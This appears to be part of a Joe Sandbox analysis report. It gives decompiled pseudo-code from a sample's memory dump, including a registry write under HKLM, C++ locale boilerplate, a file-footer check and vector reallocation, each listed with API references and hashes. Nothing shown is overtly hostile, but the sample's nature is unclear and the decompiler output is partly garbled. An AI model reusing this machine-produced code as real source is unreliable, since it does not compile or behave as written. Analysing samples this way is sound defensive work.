						_t65 = E012F56A0(_t81, _t94, _v120);
					}
					 *[fs:0x0] = _v16;
					return _t65;
				} else {
					if(_t57[0xa] >= 8) {
						_t57 =  *_t57;
					}
					if(RegOpenKeyExW(0x80000002, _t57, 0, 0xf003f,  &_v20) == 0) {
						if(_t96[0xa] >= 8) {
							_t96 =  *_t96;
						}
						RegSetValueExW(_v20, _t96, 0, 4,  &_v24, 4);
						RegCloseKey(_v20);
					}
					goto L8;
				}
			}

0x012fa2d0
0x012fa2d0
0x012fa2d3
0x012fa2d5
0x012fa2e0
0x012fa2e1
0x012fa2e5
0x012fa2ec
0x012fa2f0
0x012fa303
0x012fa30a
0x012fa314
0x012fa319
0x012fa320
0x012fa32b
0x012fa37b
0x012fa37b
0x012fa381
0x012fa38a
0x012fa38e
0x012fa393
0x012fa393
0x012fa398
0x012fa39f
0x012fa3a3
0x012fa3a6
0x012fa3ad
0x012fa3b4
0x012fa3b7
0x012fa3c0
0x012fa3c4
0x012fa3c9
0x012fa3c9
0x012fa3d9
0x012fa3e0
0x012fa3ea
0x012fa3ef
0x012fa3f6
0x012fa401
0x012fa40d
0x012fa40f
0x012fa40f
0x012fa42a
0x012fa430
0x012fa432
0x012fa432
0x012fa442
0x012fa44b
0x012fa44b
0x012fa42a
0x012fa451
0x012fa457
0x012fa460
0x012fa464
0x012fa469
0x012fa469
0x012fa46e
0x012fa475
0x012fa479
0x012fa47c
0x012fa486
0x012fa48f
0x012fa493
0x012fa498
0x012fa49e
0x012fa4aa
0x012fa333
0x012fa337
0x012fa339
0x012fa339
0x012fa354
0x012fa35a
0x012fa35c
0x012fa35c
0x012fa36c
0x012fa375
0x012fa375
0x00000000
0x012fa354

APIs

RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,000F003F,00000000,39CCA9F6), ref: 012FA34C
RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,00000008,00000004), ref: 012FA36C
RegCloseKey.ADVAPI32(00000000), ref: 012FA375
RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,000F003F,00000000,39CCA9F6), ref: 012FA422
RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,00000008,00000004), ref: 012FA442
RegCloseKey.ADVAPI32(00000000), ref: 012FA44B

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: a2796f4115eeb7ede7b5a4e7c089f3ae31c8b4f40419e9ba0ef0d74f892601fd
Instruction ID: a47451f6a975c45b7e2e80fd13704338ae1412b7d08549ec5e242100854a7d54
Opcode Fuzzy Hash: a2796f4115eeb7ede7b5a4e7c089f3ae31c8b4f40419e9ba0ef0d74f892601fd
Instruction Fuzzy Hash: 64518C70920219DFEB24DF98DC49BAEFBB8FB14314F50052DEB15A72A0D7746A08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012FCB40, Relevance: 9.1, APIs: 6, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012FCB40(void* __edi, void* __fp0, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v28;
				char _v32;
				intOrPtr* _v36;
				char _v52;
				char _v104;
				char _v148;
				void* __esi;
				signed int _t41;
				signed int _t42;
				intOrPtr* _t45;
				intOrPtr _t49;
				intOrPtr _t51;
				void* _t56;
				void* _t61;
				signed int _t66;
				signed int _t67;
				intOrPtr _t69;
				intOrPtr _t76;
				void* _t82;
				signed int _t85;
				intOrPtr* _t88;
				intOrPtr* _t89;
				void* _t90;
				signed int _t91;
				void* _t98;
				void* _t107;

				_t107 = __fp0;
				_push(0xffffffff);
				_push(0x1365de4);
				_push( *[fs:0x0]);
				_t41 =  *0x13a4018; // 0x39cca9f6
				_t42 = _t41 ^ _t91;
				_v20 = _t42;
				_push(_t42);
				 *[fs:0x0] =  &_v16;
				_t88 = _a4;
				_v24 = _t88;
				E013177B6( &_v32, 0);
				_v8 = 0;
				_t85 =  *0x13aa88c; // 0xe
				_t45 =  *0x13ab7f8; // 0x0
				_v36 = _t45;
				if(_t85 == 0) {
					E013177B6( &_v28, _t85);
					_t98 =  *0x13aa88c - _t85; // 0xe
					if(_t98 == 0) {
						_t66 =  *0x13aa878; // 0x27
						_t67 = _t66 + 1;
						 *0x13aa878 = _t67;
						 *0x13aa88c = _t67;
					}
					E0131780E( &_v28);
					_t85 =  *0x13aa88c; // 0xe
				}
				_t10 = _t88 + 4; // 0x45c6e045
				_t69 =  *_t10;
				if(_t85 >=  *((intOrPtr*)(_t69 + 0xc))) {
					_t89 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t69 + 0x14)) == 0) {
						L11:
						if(_t89 != 0) {
							L19:
							E0131780E( &_v32);
							 *[fs:0x0] = _v16;
							_pop(_t90);
							return E0132EA79(_v20 ^ _t91, _t90);
						}
						L12:
						_t49 = _v36;
						if(_t49 == 0) {
							_t89 = E0132EA8A(_t89, __eflags, 0x44);
							_v36 = _t89;
							_v8 = 1;
							_t24 = _v24 + 4; // 0x428d0824
							_t76 =  *_t24;
							__eflags = _t76;
							if(_t76 == 0) {
								_t51 = 0x13836c2;
							} else {
								_t51 =  *((intOrPtr*)(_t76 + 0x18));
								__eflags = _t51;
								if(_t51 == 0) {
									_t26 = _t76 + 0x1c; // 0x428d0840
									_t51 = _t26;
								}
							}
							E012F96C0(_t51);
							 *((intOrPtr*)(_t89 + 4)) = 0;
							 *_t89 = 0x137652c;
							E01317C11(_t85, _t89, __eflags, _t107,  &_v52);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							_t56 = E01317EF8(_t82, __eflags,  &_v148);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x18], xmm0");
							asm("movups xmm0, [eax+0x10]");
							asm("movups [esi+0x28], xmm0");
							asm("movq xmm0, [eax+0x20]");
							asm("movq [esi+0x38], xmm0");
							 *((intOrPtr*)(_t89 + 0x40)) =  *((intOrPtr*)(_t56 + 0x28));
							E012F9770( &_v104);
							_v24 = _t89;
							_v8 = 2;
							E0131792B(__eflags, _t89);
							 *((intOrPtr*)( *_t89 + 4))();
							 *0x13ab7f8 = _t89;
						} else {
							_t89 = _t49;
						}
						goto L19;
					}
					_t61 = E01317957();
					if(_t85 >=  *((intOrPtr*)(_t61 + 0xc))) {
						goto L12;
					}
					_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 8)) + _t85 * 4));
					goto L11;
				}
				_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 8)) + _t85 * 4));
				if(_t89 != 0) {
					goto L19;
				}
				goto L8;
			}

0x012fcb40
0x012fcb43
0x012fcb45
0x012fcb50
0x012fcb57
0x012fcb5c
0x012fcb5e
0x012fcb63
0x012fcb67
0x012fcb6d
0x012fcb75
0x012fcb78
0x012fcb7d
0x012fcb84
0x012fcb8a
0x012fcb8f
0x012fcb94
0x012fcb9a
0x012fcb9f
0x012fcba5
0x012fcba7
0x012fcbac
0x012fcbad
0x012fcbb2
0x012fcbb2
0x012fcbba
0x012fcbbf
0x012fcbbf
0x012fcbc5
0x012fcbc5
0x012fcbcb
0x012fcbdd
0x012fcbdd
0x012fcbdf
0x012fcbe3
0x012fcbf5
0x012fcbf7
0x012fccb2
0x012fccb5
0x012fccbf
0x012fccc8
0x012fccd6
0x012fccd6
0x012fcbfd
0x012fcbfd
0x012fcc02
0x012fcc12
0x012fcc17
0x012fcc1a
0x012fcc21
0x012fcc21
0x012fcc24
0x012fcc26
0x012fcc34
0x012fcc28
0x012fcc28
0x012fcc2b
0x012fcc2d
0x012fcc2f
0x012fcc2f
0x012fcc2f
0x012fcc2d
0x012fcc3d
0x012fcc45
0x012fcc4d
0x012fcc53
0x012fcc58
0x012fcc62
0x012fcc66
0x012fcc71
0x012fcc74
0x012fcc78
0x012fcc7c
0x012fcc80
0x012fcc85
0x012fcc8d
0x012fcc90
0x012fcc95
0x012fcc99
0x012fcc9d
0x012fcca9
0x012fccac
0x012fcc04
0x012fcc04
0x012fcc04
0x00000000
0x012fcc02
0x012fcbe5
0x012fcbed
0x00000000
0x00000000
0x012fcbf2
0x00000000
0x012fcbf2
0x012fcbd0
0x012fcbd5
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 012FCB78
std::_Lockit::_Lockit.LIBCPMT ref: 012FCB9A
std::_Lockit::~_Lockit.LIBCPMT ref: 012FCBBA
__Getctype.LIBCPMT ref: 012FCC53
std::_Facet_Register.LIBCPMT ref: 012FCC9D
std::_Lockit::~_Lockit.LIBCPMT ref: 012FCCB5

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: bfd8304b77faafce359035334ee3330d632b573f7363171a7ee848a4891856f8
Instruction ID: 8937e0132317fcd3ce3fd22b6adc736cbe0c05f93928e5d46cdbfd433609c894
Opcode Fuzzy Hash: bfd8304b77faafce359035334ee3330d632b573f7363171a7ee848a4891856f8
Instruction Fuzzy Hash: 0951A171D0065ACFDB25DF68C440BAAFBF8FF18314F14416DD946AB255EB30A985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012FC9A0, Relevance: 9.1, APIs: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E012FC9A0(void* __ebx, intOrPtr __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v60;
				char _v112;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t46;
				intOrPtr* _t54;
				intOrPtr _t58;
				intOrPtr* _t61;
				void* _t63;
				signed int _t68;
				signed int _t69;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t86;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				void* _t94;
				signed int _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t101;
				void* _t110;

				_t86 = __edx;
				_push(0xffffffff);
				_push(0x1365d8d);
				_push( *[fs:0x0]);
				_t97 = _t96 - 0x60;
				_t45 =  *0x13a4018; // 0x39cca9f6
				_t46 = _t45 ^ _t95;
				_v20 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_t92 = _a4;
				_v36 = _t92;
				_v24 = 0;
				E013177B6( &_v28, 0);
				_v8 = 0;
				_t89 =  *0x13ab800; // 0x12
				_t71 =  *0x13ab7fc; // 0x0
				if(_t89 == 0) {
					E013177B6( &_v24, _t89);
					_t101 =  *0x13ab800 - _t89; // 0x12
					if(_t101 == 0) {
						_t68 =  *0x13aa878; // 0x27
						_t69 = _t68 + 1;
						 *0x13aa878 = _t69;
						 *0x13ab800 = _t69;
					}
					E0131780E( &_v24);
					_t89 =  *0x13ab800; // 0x12
				}
				_t74 =  *((intOrPtr*)(_t92 + 4));
				if(_t89 >=  *((intOrPtr*)(_t74 + 0xc))) {
					_t93 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t93 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 8)) + _t89 * 4));
					if(_t93 != 0) {
						L19:
						E0131780E( &_v28);
						 *[fs:0x0] = _v16;
						_pop(_t94);
						return E0132EA79(_v20 ^ _t95, _t94);
					}
					L8:
					if( *((char*)(_t74 + 0x14)) == 0) {
						L11:
						if(_t93 != 0) {
							goto L19;
						}
						L12:
						if(_t71 == 0) {
							_t93 = E0132EA8A(_t93, __eflags, 0x10);
							_t98 = _t97 + 4;
							_v32 = _t93;
							_v8 = 1;
							_t54 = E012F9900(_v36,  &_v60);
							_v8 = 2;
							__eflags =  *((intOrPtr*)(_t54 + 0x14)) - 0x10;
							_v24 = 1;
							if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
								_t54 =  *_t54;
							}
							E012F96C0(_t54);
							 *((intOrPtr*)(_t93 + 4)) = 0;
							 *_t93 = 0x1376650;
							 *((intOrPtr*)(_t93 + 8)) = E01317D7A(_t86, __eflags, _t110);
							 *((intOrPtr*)(_t93 + 0xc)) = _t86;
							E012F9770( &_v112);
							_v8 = 0;
							_t58 = _v40;
							__eflags = _t58 - 0x10;
							if(__eflags >= 0) {
								_t61 = _t58 + 1;
								__eflags = _t61;
								_push(_t61);
								E012F56A0(_t71, _t89, _v60);
								_t98 = _t98 + 8;
							}
							_v44 = 0;
							_v40 = 0xf;
							_v60 = 0;
							_v32 = _t93;
							_v8 = 4;
							E0131792B(__eflags, _t93);
							 *((intOrPtr*)( *_t93 + 4))();
							 *0x13ab7fc = _t93;
						} else {
							_t93 = _t71;
						}
						goto L19;
					}
					_t63 = E01317957();
					if(_t89 >=  *((intOrPtr*)(_t63 + 0xc))) {
						goto L12;
					}
					_t93 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) + _t89 * 4));
					goto L11;
				}
			}

0x012fc9a0
0x012fc9a3
0x012fc9a5
0x012fc9b0
0x012fc9b1
0x012fc9b4
0x012fc9b9
0x012fc9bb
0x012fc9c1
0x012fc9c5
0x012fc9cb
0x012fc9d3
0x012fc9d6
0x012fc9dd
0x012fc9e2
0x012fc9e9
0x012fc9ef
0x012fc9f7
0x012fc9fd
0x012fca02
0x012fca08
0x012fca0a
0x012fca0f
0x012fca10
0x012fca15
0x012fca15
0x012fca1d
0x012fca22
0x012fca22
0x012fca28
0x012fca2e
0x012fca40
0x012fca40
0x00000000
0x012fca30
0x012fca33
0x012fca38
0x012fcb11
0x012fcb14
0x012fcb1e
0x012fcb27
0x012fcb36
0x012fcb36
0x012fca42
0x012fca46
0x012fca58
0x012fca5a
0x00000000
0x00000000
0x012fca60
0x012fca62
0x012fca72
0x012fca74
0x012fca77
0x012fca81
0x012fca85
0x012fca8a
0x012fca8e
0x012fca92
0x012fca99
0x012fca9b
0x012fca9b
0x012fcaa1
0x012fcaa6
0x012fcaad
0x012fcab8
0x012fcabb
0x012fcac1
0x012fcac6
0x012fcacd
0x012fcad0
0x012fcad3
0x012fcad5
0x012fcad5
0x012fcad6
0x012fcada
0x012fcadf
0x012fcadf
0x012fcae2
0x012fcae9
0x012fcaf0
0x012fcaf4
0x012fcaf8
0x012fcafc
0x012fcb08
0x012fcb0b
0x012fca64
0x012fca64
0x012fca64
0x00000000
0x012fca62
0x012fca48
0x012fca50
0x00000000
0x00000000
0x012fca55
0x00000000
0x012fca55

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 012FC9DD
std::_Lockit::_Lockit.LIBCPMT ref: 012FC9FD
std::_Lockit::~_Lockit.LIBCPMT ref: 012FCA1D
__Getcoll.LIBCPMT ref: 012FCAB3
std::_Facet_Register.LIBCPMT ref: 012FCAFC
std::_Lockit::~_Lockit.LIBCPMT ref: 012FCB14

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: e82fa3ca994f79f828378f602f3c41e5aca05bb75810e652a40c9e965b04b128
Instruction ID: 07c39da4e2d39751b4a6869b960dc444aaf2d1f66fde212b39e69d604c0dd3ed
Opcode Fuzzy Hash: e82fa3ca994f79f828378f602f3c41e5aca05bb75810e652a40c9e965b04b128
Instruction Fuzzy Hash: 6341CC7190021A8FDB25EF98D440BAEFBF8EF14714F14406DD606AB385D771AA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01309210, Relevance: 9.1, APIs: 6, Instructions: 115
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E01309210(void* __ebx, void* __ecx, void* __edi, WCHAR* _a4) {
				signed int _v8;
				void* _v20;
				void* _v28;
				long _v32;
				union _LARGE_INTEGER* _v40;
				long _v44;
				void* __esi;
				signed int _t24;
				WCHAR* _t26;
				signed char _t43;
				void* _t57;
				void* _t59;
				void* _t60;
				signed int _t61;

				_t63 = (_t61 & 0xfffffff8) - 0x2c;
				_t24 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t24 ^ (_t61 & 0xfffffff8) - 0x0000002c;
				_t26 = _a4;
				_t43 = 0;
				_t59 = __ecx;
				if(_t26[8] == 0) {
					L16:
					_pop(_t60);
					return E0132EA79(_v8 ^ _t63, _t60);
				} else {
					if(_t26[0xa] >= 8) {
						_t26 =  *_t26;
					}
					_t57 = CreateFileW(_t26, 0x80000000, 0, 0, 3, 0x80, 0);
					if(_t57 == 0xffffffff) {
						goto L16;
					}
					asm("xorps xmm0, xmm0");
					asm("movq [esp+0x10], xmm0");
					_push(2);
					asm("adc eax, 0xffffffff");
					asm("movq [esp+0x28], xmm0");
					asm("movups [esi+0x38], xmm0");
					asm("movups [esi+0x48], xmm0");
					if(SetFilePointerEx(_t57, _v44 + 0xffffffe8, _v40,  &_v28) != 0) {
						_v32 = 0;
						if(ReadFile(_t57, _t59 + 0x38, 0x18,  &_v32, 0) != 0) {
							if(_v32 != 0x18 ||  *((intOrPtr*)(_t59 + 0x48)) != 0x1030307 ||  *((intOrPtr*)(_t59 + 0x40)) != 0x200) {
								asm("xorps xmm0, xmm0");
								asm("movq [esp+0x10], xmm0");
								_push(2);
								asm("adc eax, 0xffffffff");
								asm("movq [esp+0x30], xmm0");
								asm("movups [esi+0x38], xmm0");
								asm("movups [esi+0x48], xmm0");
								if(SetFilePointerEx(_t57, _v44 + 0xffffffe0, _v40,  &_v20) != 0) {
									_v44 = 0;
									if(ReadFile(_t57, _t59 + 0x38, 0x18,  &_v44, 0) != 0 && _v44 == 0x18 &&  *((intOrPtr*)(_t59 + 0x48)) == 0x1030307) {
										_t43 =  ==  ? 1 : _t43 & 0x000000ff;
									}
								}
							} else {
								_t43 = 1;
							}
						}
					}
					CloseHandle(_t57);
					goto L16;
				}
			}

0x01309216
0x01309219
0x01309220
0x01309224
0x01309229
0x0130922b
0x01309232
0x01309364
0x0130936b
0x01309377
0x01309238
0x0130923c
0x0130923e
0x0130923e
0x01309259
0x0130925e
0x00000000
0x00000000
0x01309264
0x0130926b
0x0130927c
0x0130927f
0x01309282
0x0130928a
0x0130928f
0x0130929b
0x013092a7
0x013092bf
0x013092ca
0x013092e2
0x013092e9
0x013092fa
0x013092fd
0x01309300
0x01309308
0x0130930d
0x01309319
0x01309321
0x01309339
0x0130935a
0x0130935a
0x01309339
0x013092de
0x013092de
0x013092de
0x013092ca
0x013092bf
0x0130935e
0x00000000
0x0130935e

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000010,00000000,?,?,?,?,?,?,01308C29), ref: 01309253
SetFilePointerEx.KERNEL32(00000000,?,?,?,00000002,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 01309293
ReadFile.KERNEL32(00000000,?,00000018,?), ref: 013092B7
SetFilePointerEx.KERNEL32(00000000,?,?,?,00000002), ref: 01309311
ReadFile.KERNEL32(00000000,?,00000018,?,00000000), ref: 01309331
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 0130935E

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: File$PointerRead$CloseCreateHandle
String ID:
API String ID: 683849867-0
Opcode ID: 3e14e5556c2cfcf62c1467144ae7094786fb38b3924319a26387c22e4bd6386f
Instruction ID: 0f51b9a010004a538a7dc4915d419f2fb3c3d4a273611ac71a5288c10a9bfb4f
Opcode Fuzzy Hash: 3e14e5556c2cfcf62c1467144ae7094786fb38b3924319a26387c22e4bd6386f
Instruction Fuzzy Hash: AA41AE30A043049BE631CF28CC84B67B3ECBB8A728F145B1DF5A5965D1D770E588CB66

Uniqueness

Uniqueness Score: -1.00%

Function 01314930, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E01314930(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __edi;
				short _t76;
				signed int _t77;
				void* _t84;
				intOrPtr _t87;
				signed int _t89;
				signed int _t90;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t115;
				unsigned int _t120;
				intOrPtr _t125;
				unsigned int _t137;
				short* _t141;
				intOrPtr* _t148;
				unsigned int _t149;
				signed int _t155;
				signed int _t156;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				void* _t166;
				void* _t167;
				void* _t168;

				_t167 = _t166 - 0xc;
				_push(__ebx);
				_t148 = __ecx;
				_t110 =  *__ecx;
				_t115 =  *((intOrPtr*)(__ecx + 4)) - _t110;
				_v8 = (0x66666667 * (_a4 - _t110) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * (_a4 - _t110) >> 0x20 >> 4);
				_t137 = 0x66666667 * _t115 >> 0x20 >> 4;
				_t155 = (_t137 >> 0x1f) + _t137;
				if(_t155 == 0x6666666) {
					L10:
					_t76 = E012F56E0(_t110, _t115, _t137, _t148, __eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t155);
					_push(_t148);
					_t149 = _t137;
					_t156 = _t115;
					__eflags = _t156 - _t149;
					if(_t156 != _t149) {
						asm("o16 nop [eax+eax]");
						do {
							_t77 =  *(_t156 + 0x14);
							__eflags = _t77 - 8;
							if(_t77 >= 8) {
								_push(2 + _t77 * 2);
								E012F56A0(_t110, _t149,  *_t156);
								_t167 = _t167 + 8;
							}
							_t76 = 0;
							 *((intOrPtr*)(_t156 + 0x10)) = 0;
							 *(_t156 + 0x14) = 7;
							 *_t156 = 0;
							_t156 = _t156 + 0x28;
							__eflags = _t156 - _t149;
						} while (_t156 != _t149);
					}
					return _t76;
				} else {
					_t155 = _t155 + 1;
					_v12 = _t155;
					_t120 = (0x66666667 * ( *((intOrPtr*)(__ecx + 8)) - _t110) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * ( *((intOrPtr*)(__ecx + 8)) - _t110) >> 0x20 >> 4);
					_t137 = _t120 >> 1;
					if(_t120 <= 0x6666666 - _t137) {
						_t84 = _t137 + _t120;
						__eflags = _t84 - _t155;
						_t115 =  >=  ? _t84 : _t155;
						__eflags = _t115 - 0x6666666;
						if(_t115 <= 0x6666666) {
							goto L3;
						} else {
							E012F4A60();
							goto L10;
						}
					} else {
						_t115 = 0x6666666;
						L3:
						_v16 = _t115 + _t115 * 4 << 3;
						_t87 = E012F57D0(_t110, _t137, _t148, _t115 + _t115 * 4 << 3);
						_t141 = _a8;
						_t111 = _t87;
						_t168 = _t167 + 4;
						_t89 = _v8 + _v8 * 4;
						 *((intOrPtr*)(_t111 + 0x10 + _t89 * 8)) = 0;
						_t90 = _t111 + _t89 * 8;
						 *((intOrPtr*)(_t90 + 0x14)) = 0;
						asm("movups xmm0, [edx]");
						_v8 = _t90;
						_t158 = _v8;
						asm("movups [eax], xmm0");
						asm("movq xmm0, [edx+0x10]");
						asm("movq [eax+0x10], xmm0");
						 *_t141 = 0;
						 *((intOrPtr*)(_t141 + 0x10)) = 0;
						 *(_t141 + 0x14) = 7;
						 *((intOrPtr*)(_t158 + 0x18)) =  *((intOrPtr*)(_t141 + 0x18));
						 *((intOrPtr*)(_t158 + 0x1c)) =  *((intOrPtr*)(_t141 + 0x1c));
						_t159 = _a4;
						 *((intOrPtr*)(_t158 + 0x20)) =  *((intOrPtr*)(_t141 + 0x20));
						_t124 =  *_t148;
						_t142 =  *((intOrPtr*)(_t148 + 4));
						_push( *_t148);
						_push(_t111);
						if(_t159 !=  *((intOrPtr*)(_t148 + 4))) {
							E01314DF0(_t124, _t159, _t148);
							_t168 = _t168 + 4;
							_t142 =  *((intOrPtr*)(_t148 + 4));
							_t124 = _t159;
							_push(_v8 + 0x28);
						}
						E01314DF0(_t124, _t142, _t148);
						_t125 =  *_t148;
						_t160 = _v12;
						if(_t125 != 0) {
							_push(_t125);
							L11();
							_push((0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4) + ((0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4)) * 4 << 3);
							E012F56A0(_t111, _t148,  *_t148);
							_t160 = _v12;
						}
						 *_t148 = _t111;
						 *((intOrPtr*)(_t148 + 4)) = _t111 + (_t160 + _t160 * 4) * 8;
						 *((intOrPtr*)(_t148 + 8)) = _v16 + _t111;
						return _v8;
					}
				}
			}

0x01314933
0x0131493e
0x01314941
0x01314943
0x0131494c
0x01314958
0x01314962
0x0131496a
0x01314972
0x01314abb
0x01314abb
0x01314ac0
0x01314ac1
0x01314ac2
0x01314ac3
0x01314ac4
0x01314ac5
0x01314ac6
0x01314ac7
0x01314ac8
0x01314ac9
0x01314aca
0x01314acb
0x01314acc
0x01314acd
0x01314ace
0x01314acf
0x01314ad0
0x01314ad1
0x01314ad2
0x01314ad4
0x01314ad6
0x01314ad8
0x01314ada
0x01314ae0
0x01314ae0
0x01314ae3
0x01314ae6
0x01314aef
0x01314af2
0x01314af7
0x01314af7
0x01314afa
0x01314afc
0x01314b03
0x01314b0a
0x01314b0d
0x01314b10
0x01314b10
0x01314ae0
0x01314b16
0x01314978
0x01314982
0x0131498a
0x01314995
0x01314999
0x0131499f
0x01314aa0
0x01314aa5
0x01314aa7
0x01314aaa
0x01314ab0
0x00000000
0x01314ab6
0x01314ab6
0x00000000
0x01314ab6
0x013149a5
0x013149a5
0x013149aa
0x013149b1
0x013149b4
0x013149b9
0x013149bc
0x013149c1
0x013149c4
0x013149c7
0x013149cf
0x013149d2
0x013149d9
0x013149dc
0x013149df
0x013149e2
0x013149e5
0x013149ea
0x013149f1
0x013149f4
0x013149fb
0x01314a08
0x01314a0d
0x01314a15
0x01314a18
0x01314a1b
0x01314a1d
0x01314a20
0x01314a21
0x01314a24
0x01314a28
0x01314a30
0x01314a33
0x01314a39
0x01314a3b
0x01314a3b
0x01314a3c
0x01314a41
0x01314a46
0x01314a4b
0x01314a50
0x01314a51
0x01314a74
0x01314a76
0x01314a7b
0x01314a7e
0x01314a8a
0x01314a8c
0x01314a94
0x01314a9d
0x01314a9d
0x0131499f

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 01314AB6

Strings

gfff, xrefs: 01314939
gfff, xrefs: 0131495B
gfff, xrefs: 01314A58
gfff, xrefs: 0131497B

Memory Dump Source

